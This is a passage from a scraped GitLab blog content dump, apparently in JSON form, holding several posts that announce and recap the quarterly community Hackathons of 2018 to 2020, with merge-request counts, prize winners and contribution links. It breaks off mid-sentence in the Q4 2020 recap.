contributors to get 440 merge requests merged in a single month! I’m certain this change contributed, among other\nchanges and initiatives, to that record. We will keep learning as we progress. It certainly allowed us to take a peek\ninto our little black box.\n\n## What’s next?\n\nNext up is to continue our iterations and move further towards automation. Right now it is up to the reviewer to set the\nstatus back to `workflow::in dev` whenever there is something left to address. We notice that this is not always changed\nback when it’s actually needed. It is also causing false-positives with reviewers and our wider community members.\nThe Contributor Success team is looking into how this can be automated. If you’d like to help, the automation happens in\nthe [Triage Ops project](https://gitlab.com/gitlab-org/quality/triage-ops/) and the Contributor Success [issue\nqueue](https://gitlab.com/gitlab-com/quality/contributor-success/-/issues) is open for everyone!\n\nWe’re also looking into a new program called [Leading\nOrganizations](https://gitlab.com/gitlab-com/www-gitlab-com/-/merge_requests/110700) which rewards recurring\ncontributors, and their organizations, with a review time objective of four business days. This would lead us to even\nshorter review cycle times and give those organizations that contribute to GitLab a competitive advantage to stay\nleaders in their domain. The faster we can innovate together, the faster our dual flywheel will spin. Together we go to\ninfinity and beyond. Together we can build software fast.\n\n\n\n\n",[4433,708,9],"code review",{"slug":4435,"featured":6,"template":689},"pursuing-faster-time-to-merge-for-wider-community-contributions","content:en-us:blog:pursuing-faster-time-to-merge-for-wider-community-contributions.yml","Pursuing Faster Time To Merge For Wider Community Contributions","en-us/blog/pursuing-faster-time-to-merge-for-wider-community-contributions.yml","en-us/blog/pursuing-faster-time-to-merge-for-wider-community-contributions",{"_path":4441,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4442,"content":4447,"config":4452,"_id":4454,"_type":14,"title":4455,"_source":16,"_file":4456,"_stem":4457,"_extension":19},"/en-us/blog/q1-hackathon-announcement",{"title":4443,"description":4444,"ogTitle":4443,"ogDescription":4444,"noIndex":6,"ogImage":1348,"ogUrl":4445,"ogSiteName":673,"ogType":674,"canonicalUrls":4445,"schema":4446},"Get ready for the Q1'2019 GitLab Hackathon","The first Hackathon in 2019 for the GitLab community will take place on February 12-13.","https://about.gitlab.com/blog/q1-hackathon-announcement","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Get ready for the Q1'2019 GitLab Hackathon\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2019-01-14\",\n      }",{"title":4443,"description":4444,"authors":4448,"heroImage":1348,"date":4449,"body":4450,"category":10,"tags":4451},[704],"2019-01-14","\n\nFirst of all, I want to wish a Happy New Year to everyone in the GitLab community! I'm certainly looking forward to continued collaboration with everyone in 2019. Following successful [Hackathons in 2018](/community/hackathon/past-events/), I'm excited to announce that the first Hackathon this year will take place on Feb. 12-13.\n\n## What's the deal?\n\nThis is a virtual event where community members get together to work on merge requests (MRs) and also to welcome and help new contributors. We will be adding more details on [the Hackathon landing page](/community/hackathon/), as we get closer to the event, including prizes for everyone who has MRs merged within 10 days of the conclusion of the Hackathon.\n\n## What else is taking place?\n\nWe are again planning tutorial sessions where community experts will lead presentations plus Q&A sessions on a variety of topics. As speakers get confirmed, you will see tutorial sessions added on [the Hackathon landing page](/community/hackathon/). All the tutorial sessions will be recorded and added to the [GitLab Hackathon playlist](https://www.youtube.com/playlist?list=PLFGfElNsQthapq-CyXBTVnT2yKqg1JrNh). If you missed tutorials from past Hackathons, I encourage you to check out videos from the playlist.\n\n![Hackthon playlist](https://about.gitlab.com/images/blogimages/hackathon-playlist.png){: .shadow.medium.center}\n*\u003Csmall>Tutorial videos on the Hackathon playlist\u003C/small>*\n\nFor the upcoming Hackathon, we will also be highlighting issues from different [GitLab product categories](/handbook/product/categories/) that we want to encourage community members to work on. There will be additional prizes for community members who work on these issues and have MRs merged.\n\n## Where can I find help during the Hackathon?\n\nFor communications during the Hackathon, we will again use the [GitLab Community room in Gitter](https://gitter.im/gitlabhq/community). This is a channel designed to have community-related discussions and for community members to help each other as people have questions when contributing to GitLab. This is open to everyone, so please [join the room](https://gitter.im/gitlabhq/community) if you are not part of it already.\n\n## How do I get started with contributing?\n\nA good place to start is the [Contributing to GitLab page](/community/contribute/), where you can learn how you can\ncontribute to GitLab code, documentation, translation, and UX design.\n\nIf you have any questions, you are always welcome to reach me at rpaik@gitlab.com.\n\nCover image: [\"GitLab application screengrab\"](https://unsplash.com/photos/ZV_64LdGoao) by [Pankaj Patel](https://unsplash.com/@pankajpatel)\n{: .note}\n",[267,779,9,277],{"slug":4453,"featured":6,"template":689},"q1-hackathon-announcement","content:en-us:blog:q1-hackathon-announcement.yml","Q1 Hackathon Announcement","en-us/blog/q1-hackathon-announcement.yml","en-us/blog/q1-hackathon-announcement",{"_path":4459,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4460,"content":4465,"config":4469,"_id":4471,"_type":14,"title":4472,"_source":16,"_file":4473,"_stem":4474,"_extension":19},"/en-us/blog/q1-hackathon-recap",{"title":4461,"description":4462,"ogTitle":4461,"ogDescription":4462,"noIndex":6,"ogImage":1348,"ogUrl":4463,"ogSiteName":673,"ogType":674,"canonicalUrls":4463,"schema":4464},"What went down at the Q1'2020 GitLab Hackathon","A recap of GitLab community's accomplishments during another record-setting Hackathon on February 12-13.","https://about.gitlab.com/blog/q1-hackathon-recap","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"What went down at the Q1'2020 GitLab Hackathon\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2020-03-25\",\n      }",{"title":4461,"description":4462,"authors":4466,"heroImage":1348,"date":2092,"body":4467,"category":951,"tags":4468},[704],"\n\n{::options parse_block_html=\"true\" /}\n\n\n\nThe GitLab community gathered on February 12-13 for the Q1 Hackathon and this is almost becoming a cliche, but the GitLab Community again set an impressive Hackathon record with [almost 150 MRs](https://gitlab.com/gitlab-com/marketing/community-relations/contributor-program/hackathon/-/issues/31)!\n\n## What did we accomplish?\n\nI'm not sure how many readers remember the first Hackathon in Q3'2018, but I remember being excited about [22 MRs](https://gitlab.com/gitlab-com/marketing/community-relations/contributor-program/hackathon/-/issues/4) submitted during the inaugural event. If someone told me we would see 147 MRs in a single Hackathon someday, I don't think I would have believed it. Again, I have to give big kudos to wider community members and reviewers who helped make our Hackathon such a fun and exciting event. \n\nI would like to highlight a few things from the Hackathon. First, just like in Q4 we had frontend Epics that resulted in many community contributions. One was [Replacing Underscore with Lodash](https://gitlab.com/groups/gitlab-org/-/epics/2412) created by [Scott Stern](https://gitlab.com/sstern) and the other was to [Migrate .fa-spinner to .spinner](https://gitlab.com/groups/gitlab-org/-/epics/956) that was created by [Brandon Labuschagne](https://gitlab.com/blabuschagne) before the Hackathon. Amazingly, both Scott and Brandon were able to review and provide feedback on over 50 MRs related to these Epics that turned out to be goldmines.   \n\nAlso during this Hackathon, there were MRs across more than 20 GitLab projects demonstrating the breadth of contributions (to go along with the volume). Not suprisingly, many people usually think of the [`gitlab` project](https://gitlab.com/gitlab-org/gitlab), but wider community members contributed to projects like [Charts](https://gitlab.com/gitlab-org/charts/gitlab), [Gitaly](https://gitlab.com/gitlab-org/gitaly/), [GitLab SVGs](https://gitlab.com/gitlab-org/gitlab-svgs), [Gitter](https://gitlab.com/gitlab-org/gitter), [Omnibus](https://gitlab.com/gitlab-org/omnibus-gitlab/), [Pajama Design System](https://gitlab.com/gitlab-org/gitlab-services/design.gitlab.com/), [Runner](https://gitlab.com/gitlab-org/gitlab-runner/), [Secure](https://gitlab.com/gitlab-org/security-products), [www-gitlab-com](https://gitlab.com/gitlab-com/www-gitlab-com), and others during the event.   \n\nFinally, the [GitLab Meetup Group in Hamburg](https://www.meetup.com/GitLab-Meetup-Hamburg/) had their [meetup](https://www.meetup.com/GitLab-Meetup-Hamburg/events/268054258/) to coincide with the Hackathon, so [David Planella](https://gitlab.com/dplanella), [John Coghlan](https://gitlab.com/johncoghlan), and [I](https://gitlab.com/rpaik) were able to join the Hamburg meetup remotely to talk about the Hackathon and how to contribute to GitLab. We had a great time participating in the meetup and I want to thank [Philipp Westphalen](https://gitlab.com/Phil404) for not only inviting us, but also flawlessly working the conferencing tool and the audio/video equipments. If there are other GitLab meetup organizers who are interested in organizing your meetup around a Hackathon, please let me know! \n\n![Hamburg meetup](https://about.gitlab.com/images/blogimages/hackathon-blogpost/Hamburg-meetup.png){: .shadow.medium.center}\n\n## Hackathon prizes\n\nFor this Hackathon, we have a packable duffle for everyone who had their MRs merged by February 25th and [34 people](https://gitlab.com/gitlab-com/marketing/community-relations/contributor-program/hackathon/-/issues/33) will be receiving the GitLab branded duffle bag. This sets another record for the number of people with MRs merged during the Hackathon. As we did in the past several quarters, we have a prize for second place and [Raihan Kabir](https://gitlab.com/rk4bir) is the winner with 7 MRs merged. For the grand prize, I want to award two contributors [Takuya Noguchi](https://gitlab.com/tnir) with 13 MRs merged and [Rajendra Kadam](https://gitlab.com/raju249) with 17 MRs merged. Thanks and congratulatations to everyone!\n\n![Hackathon prizes](https://about.gitlab.com/images/blogimages/hackathon-blogpost/q12020-hackathon.prizes.png){: .shadow.medium.center}\n\n## When is the next Hackathon?\n\nI'm happy to announce that the Q2 Hackathon will take place on May 13-14, 2020. It is already advertised on [the Hackathon page](/community/hackathon/) with a new countdown clock. Please look out for more announcements as we get closer to the next Hackathon date. Also, if you have any suggestions for the Q2 Hackathon please feel free to suggest them on [the GitLab Contributors Gitter](https://gitter.im/gitlabhq/contributors).\n\n## How do I get started with contributing?\n\nA good place to start is the [Contributing to GitLab page](/community/contribute/), where you can learn how you can\ncontribute to GitLab code, documentation, translation, and UX design.\n\nIf you have any questions, you are always welcome to reach me at `rpaik@gitlab.com`.\n\n[\"GitLab application screengrab\"](https://unsplash.com/photos/ZV_64LdGoao) by [Pankaj Patel](https://unsplash.com/@pankajpatel) on Unsplash\n{: .note}\n",[267,779,9],{"slug":4470,"featured":6,"template":689},"q1-hackathon-recap","content:en-us:blog:q1-hackathon-recap.yml","Q1 Hackathon Recap","en-us/blog/q1-hackathon-recap.yml","en-us/blog/q1-hackathon-recap",{"_path":4476,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4477,"content":4482,"config":4487,"_id":4489,"_type":14,"title":4490,"_source":16,"_file":4491,"_stem":4492,"_extension":19},"/en-us/blog/q2-hackathon-recap",{"title":4478,"description":4479,"ogTitle":4478,"ogDescription":4479,"noIndex":6,"ogImage":1348,"ogUrl":4480,"ogSiteName":673,"ogType":674,"canonicalUrls":4480,"schema":4481},"What went down at the Q2'2019 GitLab Hackathon","Here's a recap of GitLab community accomplishments during the Hackathon on May 29-30.","https://about.gitlab.com/blog/q2-hackathon-recap","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"What went down at the Q2'2019 GitLab Hackathon\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2019-06-24\",\n      }",{"title":4478,"description":4479,"authors":4483,"heroImage":1348,"date":4484,"body":4485,"category":10,"tags":4486},[704],"2019-06-24","\n\nThe GitLab community gathered on May 29-30 for the Q2 Hackathon, and I was again excited to see new contributors participating. We also had more people joining the tutorial sessions and watching the recordings on [the Hackathon playlist](https://www.youtube.com/playlist?list=PLFGfElNsQthapq-CyXBTVnT2yKqg1JrNh). I was surprised when one of the community members told me he joined the kickoff session when it was past 1am his time!\n\n![Hackathon playlist](https://about.gitlab.com/images/blogimages/Hackathon_playlist.png){: .shadow.medium.center}\n\n## So what did we accomplish?\n\nEven though the Hackathon was during a holiday week in many countries, [44 merge requests (MRs)](https://gitlab.com/gitlab-com/marketing/community-relations/contributor-program/hackathon/issues/18) were submitted and more than 30 of these MRs were merged within two weeks of the event. One of the things we did during this recent Hackathon was to maintain [a list of suggested issues](https://gitlab.com/gitlab-com/marketing/community-relations/contributor-program/hackathon/issues/17#suggested-issues-list), and one of the issues was picked up shortly after it was discussed during [the GitLab Monitor tutorial session](https://www.youtube.com/watch?v=mm_8wVjn808&list=PLFGfElNsQthapq-CyXBTVnT2yKqg1JrNh&index=3&t=0s). Now, that's what I call just-in-time hacking.\n\n## Hackathon prizes\n\nSimilar to past events, everyone who had MRs merged will receive a token of our appreciation for their contribution. During the Q2 Hackathon, [18 people](https://gitlab.com/gitlab-com/marketing/community-relations/contributor-program/hackathon/issues/20) had their MRs merged and we decided to award a second place prize along with the grand prize based on the number of MRs merged. I'm happy to announce that we have a tie for the second place with [Michel Engelen](https://gitlab.com/michel.engelen) and [Marc Schwede](https://gitlab.com/schwedenmut) who both had three MRs merged. The grand prize winner goes to [Marcel Amirault](https://gitlab.com/Ravlen) (a former [MVP](/community/mvp/)), with nine merged MRs.\n\nThanks and congratulations to everyone!\n\n## When is the next Hackathon?\n\nSome of the feedback I received was a suggestion to release future Hackathon dates earlier, so I'm happy to announce that the Q3 Hackathon will take place on August 28-29. It is already advertised on [the Hackathon page](/community/hackathon/) with a new countdown clock. Please look out for more announcements as we get closer to the next Hackathon date. Also, if you have any suggestions for the Q3 Hackathon please feel free to bring them to [the GitLab Contributors Gitter](https://gitter.im/gitlabhq/contributors).\n\n![Q3 Hackathon date](https://about.gitlab.com/images/blogimages/Q3_hackathon_date.png){: .shadow.medium.center}\n\n## How do I get started with contributing?\n\nA good place to start is the [Contributing to GitLab page](/community/contribute/), where you can learn how you can\ncontribute to GitLab code, documentation, translation, and UX design.\n\nIf you have any questions, you are always welcome to reach me at rpaik@gitlab.com.\n\n[\"GitLab application screengrab\"](https://unsplash.com/photos/ZV_64LdGoao) by [Pankaj Patel](https://unsplash.com/@pankajpatel) on Unsplash\n{: .note}\n",[267,779,9],{"slug":4488,"featured":6,"template":689},"q2-hackathon-recap","content:en-us:blog:q2-hackathon-recap.yml","Q2 Hackathon Recap","en-us/blog/q2-hackathon-recap.yml","en-us/blog/q2-hackathon-recap",{"_path":4494,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4495,"content":4500,"config":4504,"_id":4506,"_type":14,"title":4507,"_source":16,"_file":4508,"_stem":4509,"_extension":19},"/en-us/blog/q3-hackathon-recap",{"title":4496,"description":4497,"ogTitle":4496,"ogDescription":4497,"noIndex":6,"ogImage":1348,"ogUrl":4498,"ogSiteName":673,"ogType":674,"canonicalUrls":4498,"schema":4499},"What went down at the Q3'2020 GitLab Hackathon","A recap of community's accomplishments during another record-setting Hackathon on September 2-3.","https://about.gitlab.com/blog/q3-hackathon-recap","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"What went down at the Q3'2020 GitLab Hackathon\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2020-09-30\",\n      }",{"title":4496,"description":4497,"authors":4501,"heroImage":1348,"date":2754,"body":4502,"category":299,"tags":4503},[704],"\n{::options parse_block_html=\"true\" /}\n\nThe GitLab community gathered on September 2-3 for the Q3 Hackathon and once again the GitLab Community set an impressive Hackathon record with [313 MRs](https://gitlab.com/gitlab-com/marketing/community-relations/contributor-program/hackathon/-/issues/41) submitted!\n\n## What did we accomplish?\n\nThis opening line almost needs to be a place holder for Hackathon recaps, but the GitLab community is setting new heights with each iteration. I love seeing the chart below that shows an impressive growth in wider community contributions especially over the past 4 Hackathons. \n![hackathon chart](https://about.gitlab.com/images/blogimages/hackathon-blogpost/q3-2020-hackathon-stats.png){: .shadow.medium.center}\n\nOnce again, there were a lot of frontend/UX related epics that wider community members contributed to. A good example was for migration of [Pajamas](https://gitlab.com/gitlab-org/gitlab-services/design.gitlab.com) components and the Hackathon helped chip away at more than 1,000 issues related to this migration. One of the feedback from the previous Hackathon was to also have a plenty of backend-related issues for the Hackathon, and I want to thank many GitLab team members who helped populate the list of [suggested Hackathon issues](https://gitlab.com/gitlab-com/marketing/community-relations/contributor-program/hackathon/-/issues/41#suggested-epicsissues-for-the-hackathon) with backend items. \n\nI believe we had the most number of office hour/tutorial sessions during this Hackathon and it's great to see 100+ views of many of these sessions within 24 hours of the recordings being posted on [the Hackathon playlist](https://www.youtube.com/playlist?list=PLFGfElNsQthapq-CyXBTVnT2yKqg1JrNh). If you're interested in making a further dent in 1,000+ issues related to Pajamas components migration, you should watch the [Pajamas tutorial session](https://www.youtube.com/watch?v=cbZADXJh8fg&list=PLFGfElNsQthapq-CyXBTVnT2yKqg1JrNh&index=5&t=1s). You will see that it only takes 5-10 minutes to submit an MR for these issues.\n\n## Hackathon prizes\n\nFor this Hackathon, we have a laptop sleeve for everyone who had their MRs merged by September 15th and [30 people](https://gitlab.com/gitlab-com/marketing/community-relations/contributor-program/hackathon/-/issues/42) will be receiving the prize celebrating the 2nd anniversary of the Hackathon. As we did in the past several quarters, we have a prize for second place and want to recorgnize [Gilang Gumilar](https://gitlab.com/gilangmlr), [Kev](https://gitlab.com/KevSlashNull), and [Takuya Noguchi](https://gitlab.com/tnir) who all had more than 20 MRs  merged. For the grand prize, I want to award two contributors [Rajendra Kadam](https://gitlab.com/raju249) with 54 MRs  [Jonston Chan](https://gitlab.com/JonstonChan) with 45 MRs merged! Thanks and congratulatations to everyone!\n\n![Hackathon prizes](https://about.gitlab.com/images/blogimages/hackathon-blogpost/q3-2020-hackathon-prizes.png){: .shadow.medium.center}\n## When is the next Hackathon?\n\nThe next Hackathon will take place on December 2-3, 2020. It is already advertised on [the Hackathon page](/community/hackathon/) with a new countdown clock. Please look out for more announcements as we get closer to the next Hackathon date. Also, if you have any suggestions for the Q4 Hackathon please feel free to suggest them on [the GitLab Contributors Gitter](https://gitter.im/gitlabhq/contributors).\n\n## Community challenge\n\nYou may have noticed when you scroll through the Hackathon page that we have a new prize under the [Missed the last Hackathon?](https://about.gitlab.com/community/hackathon/#community-challenge) section. GitLab team members added the `Community challenge` label to a number [issues](https://gitlab.com/gitlab-org/gitlab/-/issues?scope=all&utf8=%E2%9C%93&state=opened&label_name[]=Community%20challenge) that we want to encourage the wider community to work on. If you submit an MR for these issues and they get merged, you will receive a custom merchadise with the \"Community challenge achieved\" message. If you love coffee or tea, I think you will enjoy this cannister for your coffee beans or tea leaves. \n\n## How do I get started with contributing?\n\nA good place to start is the [Contributing to GitLab page](/community/contribute/), where you can learn how you can\ncontribute to GitLab code, documentation, translation, UX design, and **project templates**. The [project templates](https://docs.gitlab.com/ee/development/project_templates.html) help developers get started with new languages and frameworks on GitLab. You can improve [existing built-in project templates](https://docs.gitlab.com/ee/user/project/working_with_projects.html#built-in-templates) or start a new template to be distributed with GitLab.\n",[267,779,9],{"slug":4505,"featured":6,"template":689},"q3-hackathon-recap","content:en-us:blog:q3-hackathon-recap.yml","Q3 Hackathon Recap","en-us/blog/q3-hackathon-recap.yml","en-us/blog/q3-hackathon-recap",{"_path":4511,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4512,"content":4517,"config":4522,"_id":4524,"_type":14,"title":4525,"_source":16,"_file":4526,"_stem":4527,"_extension":19},"/en-us/blog/q4-hackathon-announcement",{"title":4513,"description":4514,"ogTitle":4513,"ogDescription":4514,"noIndex":6,"ogImage":1348,"ogUrl":4515,"ogSiteName":673,"ogType":674,"canonicalUrls":4515,"schema":4516},"Get ready for the Q4'2018 GitLab Hackathon","The Q4 Hackathon for the GitLab community will take place on November 14-15.","https://about.gitlab.com/blog/q4-hackathon-announcement","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Get ready for the Q4'2018 GitLab Hackathon\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2018-10-23\",\n      }",{"title":4513,"description":4514,"authors":4518,"heroImage":1348,"date":4519,"body":4520,"category":10,"tags":4521},[704],"2018-10-23","\n\nFollowing the success of [our inaugural event](/blog/hackathon-recap/), the next quarterly Hackathon will take place on November 14-15. We're looking forward to another opportunity for collaboration and meeting with new community members!\n\n## What's the deal?\n\nThis is a virtual event where community members get together to work on merge requests (MRs) and also to welcome and help new contributors. We now have a new [Hackathon landing page](/community/hackathon/), where you will be able to find more details as we get closer to the event. Again, we will have an exciting prize for everyone who has MRs merged within 10 days of the Hackathon:\n\n![GitLab slippers](https://about.gitlab.com/images/blogimages/q4-hackathon-blog/Slippers.JPG){: .shadow.medium.center}\n*\u003Csmall>GitLab slippers for everyone with merged MRs\u003C/small>*\n\nThe person with the most MRs merged during the Hackathon will be able to show off their grand prize around the neighborhood or at a nearby skate park!\n\n![GitLab skateboard](https://about.gitlab.com/images/blogimages/q4-hackathon-blog/Skateboard_-_Gitlab.png){: .shadow.medium.center}\n*\u003Csmall>GitLab skateboard for the grand prize winner\u003C/small>*\n\n## What else is taking place?\n\nIn addition to hacking, we plan to invite community experts for quick presentations plus Q&A sessions on various topics such as getting started as a new contributor, [Meltano](https://gitlab.com/meltano), issue triage, etc. over the two days. These sessions will also be recorded and available on [GitLab YouTube channel](https://www.youtube.com/gitlab).  If you want to see materials/recordings from the last Hackathon, you can find them in [the Q3 Hackathon wiki page](https://gitlab.com/gitlab-com/marketing/community-relations/contributor-program/gitlab-hackathon/q3-2018-hackathon/wikis/Q3-2018-Hackathon#links-to-presentations-recordings).\n\n## Where can I find help during the Hackathon?\n\nFor communications during the Hackathon, we will use the [GitLab Community room in Gitter](https://gitter.im/gitlabhq/community). This is a channel designed to have community-related discussions and for community members to help each other as people have questions while contributing to GitLab. This is open to everyone, so please [join the room](https://gitter.im/gitlabhq/community) if you are not part of it already.\n\n## How do I get started with contributing?\n\nA good place to start is the [Contributing to GitLab page](/community/contribute/), where you can learn how you can\ncontribute to GitLab code, documentation, translation, and UX design.\n\nIf you have any questions, you are always welcome to reach me at rpaik@gitlab.com.\n\nCover image: [\"Gitlab application screengrab\"](https://unsplash.com/photos/ZV_64LdGoao) by [Pankaj Patel](https://unsplash.com/@pankajpatel).\n{: .note}\n",[267,779,9,277],{"slug":4523,"featured":6,"template":689},"q4-hackathon-announcement","content:en-us:blog:q4-hackathon-announcement.yml","Q4 Hackathon Announcement","en-us/blog/q4-hackathon-announcement.yml","en-us/blog/q4-hackathon-announcement",{"_path":4529,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4530,"content":4535,"config":4540,"_id":4542,"_type":14,"title":4543,"_source":16,"_file":4544,"_stem":4545,"_extension":19},"/en-us/blog/q4-hackathon-recap",{"title":4531,"description":4532,"ogTitle":4531,"ogDescription":4532,"noIndex":6,"ogImage":1348,"ogUrl":4533,"ogSiteName":673,"ogType":674,"canonicalUrls":4533,"schema":4534},"What went down at the Q4'2019 GitLab Hackathon","A recap of GitLab community's accomplishments during annother record-setting Hackathon on November 13-14.","https://about.gitlab.com/blog/q4-hackathon-recap","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"What went down at the Q4'2019 GitLab Hackathon\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2019-12-12\",\n      }",{"title":4531,"description":4532,"authors":4536,"heroImage":1348,"date":4537,"body":4538,"category":951,"tags":4539},[704],"2019-12-12","\n\n{::options parse_block_html=\"true\" /}\n\n\n\nThe GitLab community gathered on November 13-14 for the Q4 Hackathon, and I never get tired of saying that we again set a new record for the number of [MRs submitted (109)](https://gitlab.com/gitlab-com/marketing/community-relations/contributor-program/hackathon/issues/28#merge-request-list). It was great to see many new community members join with their first MRs and also follow the tutorial sessions. If you missed any of the tutorial sessions, you can find recordings on [the Hackathon playlist](https://www.youtube.com/playlist?list=PLFGfElNsQthapq-CyXBTVnT2yKqg1JrNh). Also, if you have any suggestions for tutorial topics at future Hackathons you should definitely let me know in the comments section below!\n\n## What did we accomplish?\n\nI mentioned during the kickoff session that it'd be nice to cross the 100 mark for the Hackathon MRs and we saw over 70 MRs on the first day alone. Out of the 109 Hackathon MRs, 79 of these were merged by November 25th, so again big kudos to wider community members and reviewers who made all this possible. \n\nThere are a few things I think deserve special mention. First is [this Epic](https://gitlab.com/groups/gitlab-org/-/epics/2197) that was created by Gitlab's Senior Frontend Enginner [Winnie Hellmann](https://gitlab.com/winh) before the Hackathon. The Epic had \"bite-sized\" issues that contributors were able to tackle during the event and led to almost 30 MRs during the Hackathon. I think this is a great template that we can use for future Hackathons to make it easier for participants to find issues that they can work on. Winnie was also active in providing timely reviews of these MRs and this was certainly appreciated by the wider community.  \n\nThe second highlight was [this MR](https://gitlab.com/gitlab-com/www-gitlab-com/merge_requests/34822) from [Utkarsh Gupta](https://gitlab.com/utkarsh2102) as he helped make sure gender-neutral pronouns are used in our [handbook](https://about.gitlab.com/handbook/). MRs like this help make sure that we continue to have a great community at GitLab in addition to having a great software and documentation. As you can see in the next section, Utkarsh made a lot of contributions during the Hackathon, but this MR made me feel proud to be a part of the GitLab community. \n\n![Hackathon stats](https://about.gitlab.com/images/blogimages/hackathon-blogpost/q4-hackathon-stats-chart.png){: .shadow.medium.center}\n\n## Hackathon prizes\n\nFor this Hackathon, we created a tech organizer for everyone who had their MRs merged by November 25th and [18 people](https://gitlab.com/gitlab-com/marketing/community-relations/contributor-program/hackathon/issues/29) will be receiving the GitLab branded organizer. As we did in the past few quarters, we have a prize for second place and [Lee Tickett](https://gitlab.com/leetickett) is the winner with 15 MRs merged. The grand prize goes to [Utkarsh Gupta](https://gitlab.com/utkarsh2102) with 28 MRs merged, which is another record for the grand prize (the previous record was 13 MRs). Thanks and congratulatations to everyone!\n\n![Hackathon prizes](https://about.gitlab.com/images/blogimages/hackathon-blogpost/q4-hackathon-prizes.png){: .shadow.medium.center}\n\n## When is the next Hackathon?\n\nI'm happy to announce that the Q1 Hackathon will take place on February 12-13, 2020. It is already advertised on [the Hackathon page](/community/hackathon/) with a new countdown clock. Please look out for more announcements as we get closer to the next Hackathon date. Also, if you have any suggestions for the Q1 Hackathon please feel free to suggest them on [the GitLab Contributors Gitter](https://gitter.im/gitlabhq/contributors).\n\n## How do I get started with contributing?\n\nA good place to start is the [Contributing to GitLab page](/community/contribute/), where you can learn how you can\ncontribute to GitLab code, documentation, translation, and UX design.\n\nIf you have any questions, you are always welcome to reach me at rpaik@gitlab.com.\n\n[\"GitLab application screengrab\"](https://unsplash.com/photos/ZV_64LdGoao) by [Pankaj Patel](https://unsplash.com/@pankajpatel) on Unsplash\n{: .note}\n",[267,779,9],{"slug":4541,"featured":6,"template":689},"q4-hackathon-recap","content:en-us:blog:q4-hackathon-recap.yml","Q4 Hackathon Recap","en-us/blog/q4-hackathon-recap.yml","en-us/blog/q4-hackathon-recap",{"_path":4547,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4548,"content":4553,"config":4559,"_id":4561,"_type":14,"title":4562,"_source":16,"_file":4563,"_stem":4564,"_extension":19},"/en-us/blog/q42020-hackathon-recap",{"title":4549,"description":4550,"ogTitle":4549,"ogDescription":4550,"noIndex":6,"ogImage":1348,"ogUrl":4551,"ogSiteName":673,"ogType":674,"canonicalUrls":4551,"schema":4552},"What happened at the Q4'2020 GitLab Hackathon","Here's a recap of GitLab community accomplishments during the Hackathon on Jan 6-7th of 2021.","https://about.gitlab.com/blog/q42020-hackathon-recap","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"What happened at the Q4'2020 GitLab Hackathon\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Christos Bacharakis\"}],\n        \"datePublished\": \"2021-02-08\",\n      }",{"title":4549,"description":4550,"authors":4554,"heroImage":1348,"date":4556,"body":4557,"category":10,"tags":4558},[4555],"Christos Bacharakis","2021-02-08","\n\n{::options parse_block_html=\"true\" /}\n\n\n\n\n\u003Ci class=\"fab fa-gitlab\" style=\"color:rgb(107,79,187); font-size:.85em\" aria-hidden=\"true\">\u003C/i>&nbsp;&nbsp;\nDisclaimer: Due to a [bug in our metrics platform](https://gitlab.com/gitlab-com/marketing/community-relations/contributor-program/general/-/issues/59), that was identified a month after the release of this blogpost, we updated the post with accurate information about the number of MRs submitted, MRs merged, and the winners. In addition, we are not going to take into account the 15th of January as the date the MRs had to be merged to qualify, since we noticed a significant amount of delays in reviewing the MRs.\n&nbsp;&nbsp;\u003Ci class=\"fab fa-gitlab\" style=\"color:rgb(107,79,187); font-size:.85em\" aria-hidden=\"true\">\u003C/i>\n{: .alert .alert-webcast}\n\nAnother GitLab hackathon is completed, and I would like to begin by celebrating our community contributions! Congratulations to everyone who participated and contributed to GitLab.\n\nThis time, participants managed to land 167 Merge Request, where 139 (83%) of them have already been merged across eight projects such as: GitLab, Omnibus, GitLab Development Kit, CNG, Runner and more.\n\n![Hackathon playlist](https://about.gitlab.com/images/blogimages/Hackathon_playlist.png){: .shadow.medium.center}\n\nDuring the Hackathon, a number of GitLab Team members ran a series of tutorial sessions around various GitLab Products, stages and groups like Runner, Release Stage, GitLab Pajamas, and Package Group. All of these sessions that are a resource for future contributions were recorded and can be found on our [YouTube Channel](https://www.youtube.com/playlist?list=PL05JrBw4t0KrqGydhkV_BUPrI-DBiDKfm).\n\nSomething unique about this Hackathon is that it happened two times. Originally it was scheduled to take place in December, around the time my onboarding was going to be completed; thus, we had to move it to the beginning of January. Our Tokyo community had already made arrangements for these dates, and with the lead of our Core Team member [Takuya Noguchi](https://gitlab.com/tnir), they successfully organized a [regional GitLab hackathon](https://gitlab-jp.connpass.com/event/189496/). \n\n\n## Hackathon prizes\n\nLike past events, everyone who had MRs merged will receive a token of our appreciation for their contribution. This time, [thirty seven people](https://gitlab.biterg.io/goto/2c0b5d1d60893bcec44dbfd11a16d947) had their MRs merged, where three of them had more than 10 MRs merged, which will receive the Second Prize.\n\nThe grand prize will go to both [Kev](https://gitlab.com/KevSlashNull) and [Jonston Chan](https://gitlab.com/JonstonChan) who had the highest number of merged MRs.\n\nBelow is a list of the top five contributors for this 